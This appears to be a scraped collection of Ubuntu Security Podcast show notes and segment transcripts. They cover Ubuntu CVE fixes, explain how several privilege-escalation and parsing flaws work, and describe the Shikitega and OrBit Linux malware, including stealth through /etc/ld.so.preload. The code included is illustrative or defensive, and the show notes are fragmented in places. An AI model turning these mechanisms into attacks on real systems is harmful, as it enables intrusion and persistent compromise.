something that might be a problem to them, they can tell you so that you can fix it, or they can choose to not eat your dessert if you don’t want to act on your apparent mistake. Sure, if you make your recipe public maybe you don’t get to do the prank - which is actually not really nice on your part, considering that you are hosting a holiday party to entertain people you love and care about - but if you don’t make it public, there might be people who just won’t eat your dessert out of lack of trust in you.
When we talk about source code, we have the same. Being able to check the source code for a program you wish to use will allow you to check if the source code is doing something you don’t see as being secure, or if it is behaving insecurely due to a bug. You can even create your own copy of the source with the changes you find are necessary in order to get to use the software in a way you find acceptable! However, since the code is public and a lot of people end up using it, a community usually builds around it and there are always the ones looking to improve code, fix its bugs, and make it more secure overall, so maybe you won’t even need your own edited copy of the source code, since you can just share your concerns with that community and the issue might be addressed directly in the upstream version of the code. Of course this all depends if the software you are considering has an active upstream and is being properly maintained…that is unfortunately a downside to free and open source software: not all code out there is being properly taken care of…not everyone has the holiday spirit and wants to improve on their dessert recipes. They write it once and just make it available to whoever wants to cook it without any extra additions or mistake corrections. However, fear not, because at least when we are talking about security, information regarding vulnerabilities found in open source code is mostly shared publicly, and, since it is possible to have your own copy of the code to edit, people who have these copies can also edit their own versions to fix issues that were found by other people, be it with their own fixes be it with fixes provided by the upstream developers that maintain the software (when they exist)…as we do with Ubuntu packages! So as you can see, open source truly encompasses the holiday spirit, by allowing people to share and by allowing software to improve under the suggestions of many people. The open source community being a group of friends sitting together to share that holiday dinner, find possible issues and solve them so that next year said dinner can be even more delicious…and maybe even have some extra desserts!
So there you have it, the reason why you don’t need to worry about open source being insecure just because the source code is public. Sure, there is a risk involved with having your code be public, but I had a teacher that once taught me that sometimes it is not about hiding the algorithm, but instead about making it that the algorithm is so well structured that it doesn’t matter that said algorithm is public, since there is simply no way to exploit it. The basic example are the cryptographic algorithms out there that we use to encrypt our data: the algorithms are public, since we need a standard and people need to know how things work in order to implement the standard and use it in their applications, however, it doesn’t matter that they are public and that people know the steps necessary to encrypt or decrypt some plain text, because what matters is that if there is no key, breaking the encryption is simply not achievable in our average lifespan with the average resources. The power of the algorithm is in the way it works, the math and the theory that support it, and not in its visibility. Everyone can look at the algorithm, and its security stands strong. So without that key, breaking encryption is nearly impossible. When writing open source code, the idea is to follow this same premise: write good code, in such a way that it doesn’t matter that it is public, because even if it is, it is not exploitable since you programmed it with security in mind. So no…please don’t hardcode passwords into your open source code. That is not secure practice, and that is not open source being secure. Don’t do it in your closed source code…because this is not closed source being secure also!
Strive to write a dessert recipe that is so perfect, that it doesn’t matter if someone tries to tamper with it once it is completed, your dessert will come out delicious every time! Yeah, I see you prankster cousin, trying to turn on the heat to get my trifle to melt. It won’t though because I added gelatine to it…or whatever ingredient is needed to not have cream melt…I’m not a cooking expert…my family and friends definitely know that. Anyway, of course there are problems that you might still come across even when cooking or coding with deliciousness and security in mind. Because there is no dessert that can be saved by you using 3kg of salt instead of 3g of salt on what is supposed to be something sweet, because there is an accidental extra ‘k’ in your recipe…but you get the point, and open source gets the point! Because if your dessert recipe is an open recipe and someone finds this “accidental” 3kgs-of-salt mistake - which happens, we are all human and we make mistakes - they can tell you about it and you can fix it! So buy a recipe notebook that can be left outside and no one can write on it unless they use the special notebook pen which you own the rights to, sign your instructions so that you know which ones are trustworthy, and fix the mistakes you find along the way when people that want to share this amazing thing with you give you a nudge about it. You will then know that you are doing your best to provide people with the best holiday dessert ever, so that everyone can enjoy it together during this special holiday time! Also…you know…secure open source code during the holidays as well!
Well, dearest friends and family, that is all of the holiday spirit I have to share with you today! I wish you all an amazing holiday season, filled with love, joy, open source and lots and lots of security patches! Feel free to share your thoughts about this podcast segment and the topic related to it in any of our social media channels! I hope you enjoyed it, and for now, I bid you all farewell, and until next time! Bye!
Credit to https://www.fesliyanstudios.com for the background music.
This week we cover Mark Esler’s keynote address from UbuCon Asia 2022 on Improving FOSS Security, plus we look at security vulnerabilities and updates for snapd, the Linux kernel, ca-certificates and more.
42 unique CVEs addressed
/tmp
so that its disk
usage etc gets accounted for as part of the normal /tmp
/tmp
is world writable so it is trivial for a user to create the expected
per-snap directory and place their own contents inside that such that they can
have this be executed by snap-confine
during the process of creating this
private /tmp
namespace for the snap - and hence get privilege escalation to root as snap-confine
is suidrename()
systemd-tmpfiles
to create a /tmp/snap-private-tmp/
directory on boot with the appropriate restrictive permissionssnap-confine
can create the per-snap private /tmp
within this without
fear of being interfered with by unprivileged usersio_uring
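As a general sketch of the underlying hazard (hypothetical directory name, not snapd’s actual code) - a fixed-name directory under the world-writable /tmp can never be trusted blindly if it already exists:
#include <errno.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
    const char *dir = "/tmp/example-private-dir"; /* hypothetical name */
    if (mkdir(dir, 0700) != 0) {
        if (errno != EEXIST) {
            perror("mkdir");
            return 1;
        }
        /* someone else created it - verify before trusting it */
        struct stat st;
        if (lstat(dir, &st) != 0 || !S_ISDIR(st.st_mode) ||
            st.st_uid != getuid() || (st.st_mode & 0077)) {
            fprintf(stderr, "unsafe pre-existing directory\n");
            return 1;
        }
    }
    puts("directory is safe to use");
    return 0;
}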
-> UAF (from Pwn2Own 2022)
ca-certificates
to
mark something as distrusted after a particular date - so instead we have
removed it entirely so all things signed by TrustCor would now not be trusted#ubuntu-security
for discussing this with the team
This week we look at a recent report from Elastic Security Labs on the global Linux threat landscape, plus we look at a few of the security vulnerabilities patched by the team in the past 7 days.
81 unique CVEs addressed
useradd
that required
newer glibc - broke on older Ubuntu releases so that update has been reverted
for now on those releases - still is in place on Ubuntu 22.04 LTS / 22.10
After a longer-than-expected break, the Ubuntu Security Podcast is back, covering some highlights of the various security items planned during the 23.04 development cycle, our entrance into the fediverse of Mastodon, some open positions on the team and some of the details of the various security updates from the past week.
67 unique CVEs addressed
io_uring
-> UAF (from Pwn2Own 2022)
CAP_NET_ADMIN
but this can be obtained from
within an unprivileged user namespace
canonical-livepatch status
Kernel type | 22.04 | 20.04 | 18.04 |
---|---|---|---|
aws | 90.3 | 90.2 | — |
aws-5.15 | — | 90.3 | — |
aws-5.4 | — | — | 90.2 |
azure | 90.2 | 90.2 | — |
azure-5.4 | — | — | 90.2 |
gcp | 90.3 | 90.2 | — |
gcp-5.15 | — | 90.3 | — |
gcp-5.4 | — | — | 90.2 |
generic-5.4 | — | 90.2 | 90.2 |
gke | 90.3 | 90.2 | — |
gke-5.15 | — | 90.3 | — |
gke-5.4 | — | — | 90.2 |
gkeop | — | 90.2 | — |
gkeop-5.4 | — | — | 90.2 |
ibm | 90.2 | 90.2 | — |
ibm-5.4 | — | — | 90.2 |
linux | 90.2 | — | — |
lowlatency | 90.2 | — | — |
lowlatency-5.4 | — | 90.2 | 90.2 |
/dev/shm
and
the other around the handling of UNIX domain sockets - could be combined
together with another unspecified vulnerability in a different component
installed by default on Ubuntu Server 22.04 to achieve privilege escalation to
root - will be interesting to find out what this other vulnerability is in the
futureio_uring
mediationIt’s the release of Ubuntu 22.10 Kinetic Kudu, and we give you all the details on what’s new and improved, with a particular focus on the security features, plus we cover a high priority vulnerability in libksba as well.
39 unique CVEs addressed
sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=1
named
and dig
to allow to implement strict and mutual TLS authenticationUbuntu Pro beta is announced and we cover all the details with Lech Sandecki and Eduardo Barretto, plus we cover security updates for DHCP, kitty, Thunderbird, LibreOffice, the Linux kernel, .NET 6 and more.
49 unique CVEs addressed
2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
2 different DoS against ISC DHCP server
which would fail to properly decrement a reference count and hence eventually could overflow the reference counter -> abort -> DoS
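A toy sketch of that failure mode - nothing here is ISC dhcpd's actual code, and an 8-bit counter is used just so the wrap is quick to see:
import ctypes

refs = ctypes.c_uint8(0)   # 8 bits so the wrap is visible; the real counter is wider

def take_ref():
    refs.value += 1        # the bug: a matching release is never performed

for _ in range(256):
    take_ref()             # 256 leaked references wrap the counter back to 0

assert refs.value != 0, "counter wrapped - a real server would abort here -> DoS"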
sshd failed to drop supplementary group membership when running AuthorizedKeysCommand and AuthorizedPrincipalsCommand and so would run these with group membership of the sshd process itself (even if configured to run as a different user)
[USN-5667-1] Linux kernel vulnerabilities [08:01]
io_uring UAF
Finer grained control for unprivileged user namespaces is on the horizon for Ubuntu 22.10, plus we cover security updates for PCRE, etcd, OAuthLib, SoS, Squid and more.
37 unique CVEs addressed
cjpeg utility - crafted file with a valid Targa header but incomplete data - would keep trying to read pixel data after reaching EOF - internally it used getc() which returns the special value EOF when the end of file is reached - this is actually -1 but requires the caller to check for this special value - if not, it would interpret this as pixel data (all bits set -> 255,255,255 -> white) resulting in a JPEG file that was possibly thousands of times bigger than the input file - fixed to use existing input routines to read the data which already check for the EOF condition
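A Python stand-in for the C pitfall (illustrative only - the real bug is in C): getc() returns an int that is either a byte value 0..255 or the sentinel EOF (-1), so a caller that skips the check and truncates the result to an unsigned byte turns end-of-file into 255:
EOF = -1   # C's getc() sentinel

def as_pixel_sample(returned):
    return returned & 0xFF   # what storing into an unsigned byte effectively does

print(as_pixel_sample(0x41))   # 65  - a genuine data byte
print(as_pixel_sample(EOF))    # 255 - EOF silently becomes a white sample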
http.server could be tricked via a URI which has multiple / at the beginning - a URI such as //path gets treated as an absolute URI rather than a path - could then end up sending a 301 location header with a misleading target
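The parsing quirk behind this is easy to demonstrate with Python's standard library (a related illustration, not http.server's exact code path):
from urllib.parse import urlsplit

print(urlsplit('/path'))    # path='/path' - an ordinary absolute path
print(urlsplit('//path'))   # netloc='path', path='' - '//' starts an authority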
sosreport - used to gather details of a system etc for debug/analysis
sudo sysctl kernel.unprivileged_userns_clone=0
apparmor package too
You can’t test your way out of security vulnerabilities (at least when writing your code in C), plus we cover security updates for Intel Microcode, vim, Wayland, the Linux kernel, SQLite and more.
68 unique CVEs addressed
[USN-5624-1] Linux kernel vulnerabilities [07:05]
Alex talks with special guests Nishit Majithia and Matthew Ruffell about a recent systemd regression on Ubuntu 18.04 LTS plus we cover security updates for Dnsmasq, the Linux kernel, poppler, .NET 6, rust-regex and more.
28 unique CVEs addressed
On this week’s episode we dive into the Shikitega Linux malware report from AT&T Alien Labs, plus we cover security updates for the Linux kernel, curl and Zstandard as well as some open positions on the team. Join us!
13 unique CVEs addressed
NAME=VALUE pairs using ASCII chars for both
/bin/sh - from this shell it then attempts to run commands to exploit two known privesc vulns - CVE-2021-4034 ([USN-5252-1, USN-5252-2] PolicyKit vulnerability from Episode 147) and CVE-2021-3493 ([USN-4916-2] Linux kernel vulnerability in Episode 113)
An increased rate of CVEs in curl is a good thing, and we’ll tell you why, plus we cover security updates for the Linux kernel, Firefox, Schroot, systemd and more.
37 unique CVEs addressed
#!/bin/bash
for d in $(curl -s "https://ubuntu.com/security/cves.json?order=newest&package=curl&limit=100" | jq -r ".cves[].published"); do
date +%s -d "$d";
done > curlhist
#!/usr/bin/gnuplot
binwidth = 60*60*24*365 # one year in seconds
bin(x,width)=width*floor(x/width) + width/2.0
set xdata time
set datafile missing NaN
set boxwidth binwidth
set xtics format "%Y" time rotate
set style fill solid 0.5 # fill style
set title 'Frequency of curl CVEs in the Ubuntu CVE Tracker by year'
plot 'curlhist' using (bin($1,binwidth)):(1.0) \
smooth freq with boxes notitle
This week we cover the debate around the decision in Ubuntu 22.10 to disable presenting platform security assessments to end users via GNOME, plus we look at security updates for zlib, PostgreSQL, the Linux kernel, Exim and more.
12 unique CVEs addressed
Only affects the inflateGetHeader() function so not everything that uses zlib would be affected - impact is DoS via crash
Involves the handling of sender_host_name so unlikely to affect most installations
fwupdmgr security
The HSI specification is not yet complete. To ignore this warning, use --force
This week we take a look at the recent announcement of .NET 6 for Ubuntu 22.04 LTS, plus we cover security updates for the Linux kernel, Booth, WebKitGTK, Unbound and more.
24 unique CVEs addressed
Requires CAP_NET_ADMIN which is privileged, but with unprivileged user namespaces this is trivial to obtain - so can mitigate this by disabling unprivileged user namespaces - but this may then affect applications like Google Chrome and others which use them to set up their sandboxes etc
sudo sysctl kernel.unprivileged_userns_clone=0
Would accept requests with multiple Transfer-Encoding headers - but would only process the first - could then allow the second to be misinterpreted by other proxies etc which could then be used for a request smuggling attack
Booth ignored the authfile directive in its config file, allowing sites / nodes which did not have the correct auth key to communicate with nodes that did - oops… - upstream refactored code previously which introduced this vuln - reverted the refactor to fix this
The dotnet6 package in Ubuntu contains the .NET 6 SDK - so can do .NET development on Ubuntu
aspnet image is 104MB (cf. aspnet:6.0-alpine at 100MB)
alpine uses a different libc (musl) and has other differences too
Finally, Ubuntu 22.04.1 LTS is released and we look at how best to upgrade, plus we cover security updates for NVIDIA graphics drivers, OpenJDK, Django, libxml, the Linux kernel and more.
52 unique CVEs addressed
ECDSA signatures consist of a pair of values r and s and these are used to then perform a bunch of calculations to check the signature is valid - this involves comparing r against r multiplied by a value derived from s - so if r and s are both zero you effectively check 0 = 0
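A toy sketch of that degenerate check - not the real ECDSA equations, and value_from_s is a hypothetical stand-in for the quantity computed from s:
def bogus_verify(r: int, s: int, value_from_s: int) -> bool:
    # the flawed shape: no range check on r and s before the comparison
    return r == r * value_from_s   # r == 0 makes this 0 == 0, always true

print(bogus_verify(0, 0, 12345))   # True - an all-zero signature is accepted
# the fix is to reject signatures unless 0 < r < n and 0 < s < n up front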
Content-Disposition header of a FileResponse object was based on a filename which is derived from user input - fixed to escape the filename so content can’t then be injected into the Content-Disposition header
X-Client-IP header was passed to WSGI applications, even when it came from an untrusted proxy, and hence could allow unintended access to services
newRows parameter
CTRL + ALT + F2
sudo do-release-upgrade
This week we dig into what community sponsored security updates are all about, plus Ubuntu 22.04.1 LTS gets delayed by a week and we cover security updates for MySQL, the Linux kernel, Samba, Net-SNMP and more.
75 unique CVEs addressed
Requires CAP_NET_ADMIN (which can be obtained via mapping to root in an unprivileged user namespace) -> privesc
MaxQueryDuration was not enforced as expected
A new patch gets added to the debian/patches directory as well as a corresponding entry for it in the debian/patches/series file, and then a new debian/changelog entry
The umt tool can be used for managing most of these steps (ie. downloading source packages, adding a new changelog entry, building the package locally in a schroot, testing the package locally in a VM etc)
Snap mount units are WantedBy=multi-user.target - ie the multi-user target wants them, which ensures they are mounted during normal boot (equivalent to runlevel 2 - ie. not a rescue shell or shutdown etc) - so basically any normal boot of the system and they should be mounted
On first boot the system boots into oem-config.target so it can run first (to create a new user etc) - and then once it is done it sets the target to the usual graphical.target which includes multi-user.target
snapd-desktop-integration is used to try and automatically install theme snaps and the like to match the system theme - it gets started as part of the oem-config and it then pokes the snapd.socket which causes snapd.service to be started - yet the snap mount units are not in place, so snapd can’t see any of the expected snaps, and as such it fails to correctly generate their state information
The fix makes the snap mount units wanted not by multi-user.target but default.target so they get mounted no matter what target is being booted into
This week we’re diving down into the depths of binary exploitation and analysis, looking at a number of recent vulnerability and malware teardowns, plus we cover security updates for FreeType, PHP, ImageMagick, protobuf-c and more.
22 unique CVEs addressed
finfo_buffer function - used to get info etc from a binary string - the example in the upstream documentation shows using this function to get the MIME info of a $_POST parameter - so likely this is being used in a bunch of places on untrusted data - DoS/RCE
It’s the 22.10 mid-cycle roadmap sprint at Canonical this week plus we look at security updates for Git, the Linux kernel, Vim, Python, PyJWT and more.
58 unique CVEs addressed
On a multi-user Windows system, a user could use C:\ to create a gitconfig that would contain commands that may then get executed by other users when running git themselves
This week we rocket back into your podcast feed with a look at the OrBit Linux malware teardown from Intezer, plus we cover security updates for cloud-init, Vim, the Linux kernel, GnuPG, Dovecot and more.
52 unique CVEs addressed
cloud-init
was originally a Canonical developed project but is now widely
used by many of the public clouds for configuring cloud images on first
boot
Trunc() or Extract() DB functions used with untrusted data
ldap.schema used to validate untrusted schemas - DoS via excessive CPU/memory usage
OrBit does not use the LD_PRELOAD environment variable but instead instructs the dynamic linker via /etc/ld.so.preload - this has benefits for the malware since the use of the LD_PRELOAD env var has various restrictions around setuid binaries etc - but this is not the case for /etc/ld.so.preload, meaning all binaries including setuid root ones are also “infected” via this technique and the malware payload gets loaded for all
When a directory is listed via readdir() the presence of the malware itself is omitted - same for even execve() so that if say a binary like ip, iptables or even strace is then executed, it can modify the output which is returned to omit its own details
It is unclear how the attackers initially write to /etc/ld.so.preload - but likely it is via vulnerabilities in privileged internet facing applications - as such, MAC systems like AppArmor then become very useful for confining these services so they cannot arbitrarily write to these quite privileged files etc
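One small defensive check this suggests (our own sketch, not from the report): /etc/ld.so.preload is normally absent or empty, so any entry deserves scrutiny - though a rootkit hooking the file APIs may hide the file from exactly this kind of userspace check:
from pathlib import Path

preload = Path('/etc/ld.so.preload')
if preload.is_file():
    for lib in preload.read_text().split():
        print('force-preloaded into every process:', lib)
else:
    print('no /etc/ld.so.preload present')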
This week we bring you part 3 of Camila’s cybersecurity buzzwords series - looking at blockchain, zero trust and quantum / post-quantum security.
Hello listener! Hopefully I set the stage well enough last time that you are back here today for more after getting excited about ending our cyber security buzzword journey with a bang! A journey where we try to understand the meaning of the word behind the buzz in order to better navigate this crazy world of ours! A little bit of an exaggerated description, some might say, but definitely not lacking in inspiration! If you haven’t listened to our previous episodes I highly recommend you do so before proceeding with this one, as preparation will be key to digest what is to come. Oh yes, today is going to be a good one. So let’s get buzzing and let’s get into it, shall we?
Buzzword #7 - which is the first buzzword of today: blockchain. Ah…this one I had to do some serious research on, because even though I hear about it all the time, as you probably do too, I didn’t really know the specifics of how it worked. Anyway, one thing I did know is that this is DEFINITELY a buzzword, one that started trending and gaining traction together with all of the crypto currencies that started showing up out there. And now, I can’t even see a job listing without the good old Blockchain developer position included within the various openings. So, what is the notorious blockchain after all? Even after researching this and learning more, it is still a very complicated thing to explain, so please be patient with me if I don’t get all the details right, although I will attempt to be as accurate as possible. Well, let’s board this train and use crypto currencies to explain how blockchains work from a HIGH LEVEL point of view, shall we? Please do note, however, that I did say HIGH LEVEL! I am by no means a blockchain/crypto currency expert, as I previously mentioned, and I will only share with you the basics of how this thing works, so that we can really get past the buzzword point of the word, even though we might not reach the true connoisseur point of it. Anyway! Let’s get to it!
Think about a blockchain as being a distributed ledger, which as per dictionary definition is “a book or other collection of financial accounts of a particular type”. So, this applies to our cryptocurrency example here, and to blockchains being applied to crypto currencies. Just to make that very clear. Each block in the blockchain is like a page of this ledger. What about the chain? We will get to that part soon enough. For our cryptocurrency situation here, let’s consider that each block in our blockchain will contain three important groups of information: data regarding transactions that have been happening for a specific cryptocurrency, a hash for this data and the hash of the block that was generated before it, or, if you’d rather think of it in analogy terms, the hash of the “page” that comes before it. What is a hash, you might ask? To keep it simple, since our topic for today is not hashing, a hash is a fixed size data output that is generated after the processing of some kind of input of variable length. So, for example, a number generated as output for the input data that is a word, which can have from 1 to…a lot of letters. The word is processed such that the position of each letter in the alphabet is used in a sum that starts with value 0. Word ‘blockchain’, in this case, would have a hash of…uh, I don’t want to calculate that, so let’s choose a simpler example. Word ‘aaa’ would have a hash of 3. There, nice and easy…and lazy. Anyway, with a good hash function - a cryptographic hash function - different input data, after being processed by a specific hash algorithm, will 99% of the time generate different outputs (which is not the case for our earlier example. You can try to figure out different words that would have the same hash. I’ll leave that as an exercise for you). All of the outputs will possess the same format, which is usually a fixed size sequence of alphanumeric characters, but, more than that, for our case, predicting changes in the hash by analyzing changes in the data is not something easy to do, that is how powerful our cryptographic hash algorithm is. Therefore, we can look at our hashes as if they were the fingerprint of the data they are connected to, if said data were a person able to have fingerprints. Different data equals different fingerprints, and forging a fingerprint, or, in other words, changing your own, is not something you can easily or seamlessly do. Ok…that being said, can you start seeing how our blocks actually constitute a chain? We have various sets of data containing information about financial transactions that are happening. Connected to each set is the hash for that specific set, as is the hash of the set that came before it! So block n will always know who n-1 is, n-1 will know who n-2 is, and so on and so forth. Therefore, if I am an attacker and I want to tamper with the data in the blockchain and say…add a transaction in which I make my worst enemy transfer all of their funds to my account, I can’t just change the data of a block in the middle of the chain without causing havoc for all of the blocks that follow it. To be able to sneakily add my fake transaction into the blockchain, not only would I need to change the data segment of the block which will contain the transaction, I will also need to change the “hash of the previous block” segment for all blocks that come after this block. If I am able to do this instantaneously, say…using a computer, then the problem is solved.
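A minimal Python sketch of the “pages and fingerprints” idea described above, using SHA-256 rather than the toy letter-sum hash (for which, incidentally, ‘ab’ also sums to 3 - one answer to the collision exercise):
import hashlib

def fingerprint(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# each block records its transactions, the previous block's hash, and its own
chain, prev_hash = [], '0' * 64
for txs in (b'alice->bob:5', b'bob->carol:2', b'carol->dave:1'):
    block_hash = fingerprint(txs + prev_hash.encode())
    chain.append({'txs': txs, 'prev': prev_hash, 'hash': block_hash})
    prev_hash = block_hash

# tamper with the middle "page": re-checking the fingerprints exposes the edit
chain[1]['txs'] = b'enemy->me:everything'
for i, block in enumerate(chain):
    ok = fingerprint(block['txs'] + block['prev'].encode()) == block['hash']
    print(i, ok)   # block 1 now prints False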
But of course it wouldn’t be that easy, or else I don’t think everyone and their mother would be freaking out about how awesome or how safe blockchain is. What is the catch then? The blockchain protocol forces you to provide a proof-of-work every time you wish to add a block to the chain. What exactly does this mean? The blockchain challenges you. It tells you: you cannot add a page to the ledger that is myself unless you solve this very hard puzzle that even a computer will take a humanly noticeable time to solve. This puzzle could be, for example, discovering which set of 100 characters you need to add at the end of the data set to force the block’s hash to start with 10 consecutive zeros. As I previously said, it is not easy to predict what is the output of a hash function given an input when you have a good hash function, so the easiest way to achieve this is by brute forcing it: testing all possibilities until you find something that matches that which you are looking for. Therefore, to add a block to the chain, you must waste some time solving the puzzle, which in turn means that changes made to the middle of the chain cannot propagate instantaneously throughout the tail of the chain. You change a block and you need to change all that follow, but for each block you will take some time solving the puzzle before adding it to the chain. If I were the one listening to this podcast and not the one doing the explaining, at this point I would have two questions: (1) why does this matter if I have full control of the blockchain? (2) Why not add your malicious transaction to the last block instead of adding it to a block in the middle, and avoid this whole ‘having to update subsequent blocks’ problem in order to end up with lots of money in your bank account? I don’t know if you have these questions as well, or started asking them after I mentioned it, but what I do know and what I can tell you is that the same answer applies to both of these: blockchain does not rely on a centralized entity to manage it, it is instead distributed. Why should we care? Because then there is never only one person that is in full control of the blockchain (the ledger). Everyone is able to grab a copy of this blockchain, follow which transactions are happening, and include them into a new block. If more than 50% of the peers which participate in building the ledger agree on the new block to be added, meaning, if more than 50% have the same resulting block after including transactions broadcasted and gathered, then this block is officially added to the chain and considered the last block of said chain. Therefore, if I plan to include a fake transaction to the new block that will be added to the chain, I need more than 50% of the peers that are also listening to transactions and building this new block to agree to include my fake transaction, which might seem simple if you have a lot of friends, but the beauty in having a non-centralized server lies in diversity and in the fact that most people will probably not want to partake in your shady activities of tampering with the blockchain. And even if it is technically possible to do this, Mr. Smarty Pants - I see you there in the corner - who will try to bring the argument down by saying “but what if I am super powerful and I CAN convince everyone to do it”: see it as one more thing a potential attacker needs to do, another burdensome task to perform in order to achieve the desired result: change the block AND convince more than 50% of the people in the peer network to go along with it.
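A minimal proof-of-work in that spirit - a brute-forced nonce stands in for the “set of 100 characters”, and four leading hex zeros keep the sketch fast:
import hashlib

def mine(block_data: bytes, difficulty: int = 4) -> int:
    nonce = 0
    while True:
        digest = hashlib.sha256(block_data + str(nonce).encode()).hexdigest()
        if digest.startswith('0' * difficulty):
            return nonce   # found only by trying possibilities one by one
        nonce += 1

print(mine(b'alice->bob:5'))   # tens of thousands of attempts on average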
Have you ever been in any comment section on the Internet? If you have, you know that ‘agreeing on things’ is not something the Internet community does very well. Anyway…more than preventing you from changing the last block, the distributed peer network will also enforce the utility of things such as the proof-of-work. If the blockchain were to be controlled by one single entity, then it matters less if it takes one nanosecond to perform the proof-of-work or if it takes a few minutes. You are a single entity in control of the data, you can eventually catch up with the new blocks that will be added to the chain. Maybe you have 1000 super computers on the side to calculate the blocks that will follow your tampered one, and then the proof-of-work is rendered kind of useless. However, with a distributed network, each peer is trying to solve the puzzle to add the next block to the chain, and once again, you can create however many blocks with fake data you want, if the entire peer-to-peer network disagrees with you on what that block should be, it won’t be added to the chain…and you will need to ask that for each new block you want to add. Other people, some of which might not have been bribed by Mr. Smarty Pants, may end up obtaining the next block in the chain first, and then all of your super computers will have worked for naught, and you would need to start all over again. It’s like participating in an auction…you can make a very high bid…but other people can also do the same. Plus, it’s even worse because everyone participating in the auction is actually checking your bank account to see if you really have the money you claim to have, and if you make a false bid…they can call you out on your lies if they wish to do so. The last question I think remains is: what would make people want to participate in the creation of a blockchain? Seems like too much work and no fun, and choosing people for the job defeats the purpose of not having a centralized entity to manage the ledger, because then, as the verb implies, you get to CHOOSE who will participate, and you can choose whoever you want, and maybe these will be people that will side with you. Well, for crypto currencies I can tell you that the bang is in the buck. The person that is the first to solve the puzzle which allows for inclusion of a new block in the chain is rewarded with a certain amount of crypto currency. Therefore, people want to participate in the blockchain creation and make sure to check that all is well because they will gain something from it. This is what we know as crypto mining. Someone who is crypto mining is trying to earn some digital cash by adding a new block to the crypto currency ledger before other people, and that is how the problem is solved. Give the people something that they want and they shall follow! Well…I think that is enough talk about blockchain, am I right? This is so long that it has almost become a mini-episode inside of a bigger one! So let’s move on and actually go to our next and almost last buzzword of this series of episodes!
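Before moving on, the “more than 50% must agree” rule from the last two paragraphs boils down to a simple majority test - a deliberately tiny sketch, since real consensus protocols are far more involved:
from collections import Counter

def accept(candidate_hashes):
    block, votes = Counter(candidate_hashes).most_common(1)[0]
    return block if votes > len(candidate_hashes) / 2 else None

print(accept(['h1', 'h1', 'h1', 'h2', 'h3']))   # 'h1' - 3 of 5 peers agree
print(accept(['h1', 'h2', 'h3', 'h4', 'h5']))   # None - no majority, no block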
Next buzzword, suggested by our one and only Alex Murray, buzzword #8, is zero trust. This one is a hard one for me to explain and I will tell you why: I already have kind of a zero trust mentality, or at least I have only heard of the “zero trust way” ever since I started studying cyber security. Or maybe it is because the term zero trust was coined very close to the time I was born. Baby me didn’t even have to know the non-zero trust model, because at that time the “never trust, always verify” slogan for this model was already something people were considering. So what is zero trust after all? I think I will begin defining it by saying it is a model. A set of rules, frameworks and principles to take into consideration when setting up your IT infrastructure, one that, as the slogan itself says, trusts no one. Trusts zero persons…zero trust. Get the origin of the name now? As a second way to define it, or as a way to complement the definition, let us go back and understand what is a non-zero trust model and why the zero trust model was created. Picture a time when the Internet was simpler, and networks were a lot more self contained than they are today. The clouds were only the ones you could see flying around in the sky and WiFi was probably just a weird name someone would give to their pet. When your entire infrastructure is restricted to one single area and your network can only be accessed by those physically present where devices of that network are also physically present at, it is easy to define your headquarters and whoever is in it as being a safe space, with safe people. You only let in people who are allowed to be in there, and people who are allowed to be in there won’t cause any harm to the infrastructure because they are friends, and not foes. Right? In comes the insider threat, that disgruntled employee that decides to do malicious things to the company’s resources and has the means to do so exactly because they are trusted. In comes more technology that allows your infrastructure to exist in more than one physical location, and that allows people to access company resources from areas outside the supposed trusted security perimeter. In come new business models for software products where third party companies are responsible for managing resources from your own company as part of a service provided by them together with their own software. And then the castle walls are no longer enough to protect the kingdom, because the kingdom is no longer just within the castle walls. Zero trust is the model that starts to consider security when the castle walls are no longer enough to prevent the occurrence of cyber attacks, exactly because we can have foes which are inside our own network and because we are expanding our own network and letting it exist beyond what would be a trusted physical location. To mention a few examples…remember our previous buzzword ‘phishing’ from a few episodes back? Well imagine that you have an attacker which is able to successfully trick one of your employees in a phishing campaign they are running. This employee clicks a malicious link and gives this attacker access to the target company’s internal network with their own set of credentials. In a model that is not zero trust, this employee’s user might have a lot of privileges inside the network. Why not let them access the database containing sensitive data? They work for the company, they must be trustworthy!
…and yet…now our attacker has access to that same database because they were able to trick someone we trust into giving them privileged information. Notice how we don’t even need to have a disgruntled employee to have an insider threat. It can be the happiest company in the world! All people who work for this company love it and would never harm it…but one of its employees just became an unknowing insider threat because they fell for the tricks of an attacker well trained in the arts of social engineering. Attacks have evolved, so the security model needs to evolve with it, and that is one of the advantages of considering the zero trust model. Another example of a situation where you might need to consider this model: nowadays we can access our work environments from anywhere, so long as anywhere has an available WiFi password for you to use. Maybe you work from home but you are tired of looking at the same boring old view from outside your window. You decide to go work at a local sweets shop for a change of scenery and a change in your lunch menu for that day. The shop has a delightful atmosphere and also has free WiFi. You connect to their network and start working, filled with new energy and joy while you drink a cup of coffee and eat some delicious ‘insert any type of food that you love here’. And yet…ah, once again I say ‘and yet’, and by now you must know some bad news is coming: and yet, this is a free network, meaning that anyone, including attackers can connect to it. You might use a VPN to access your company’s internal network, which encrypts data you are sending through the public network to it, however, you also end up using some applications without connecting to a VPN and sometimes without even having to use encryption. An attacker is sniffing for data, searching for gold, in this sweets shop’s local network, and ends up running across your network traffic and is able to extract some juicy information from it. And once again assets and resources are not kept safe because not enough is being considered when establishing processes and permissions for a company’s network. Yes, you are a trusted user and your device SHOULD be trustworthy, but as many times we have seen, it is not always that theory and practice shake hands and call it a day. IT infrastructures have evolved, so the security model needs to evolve with it, and that is one of the advantages of considering the zero trust model. Oh…wait? Am I repeating myself? Then it must mean I really want you to remember that, don’t you think? Anyway, to close this topic off, I will say that one of the most important principles in the zero trust model is the principle of least privilege, which is a good place to start from if you intend to implement this model in your own environment. The principle of least privilege states that you should only allow a user to have access to resources that they will actually need…no less and no more. No less because otherwise they won’t be able to do their jobs. No more because if you give them more, you are UNNECESSARILY increasing the attack surface for your network. If something does not exist, it cannot be taken advantage of. And that is where I’ll leave it…so you can think about this a little more while drinking your coffee and connecting to that free WiFi network in a sweets shop. Careful!
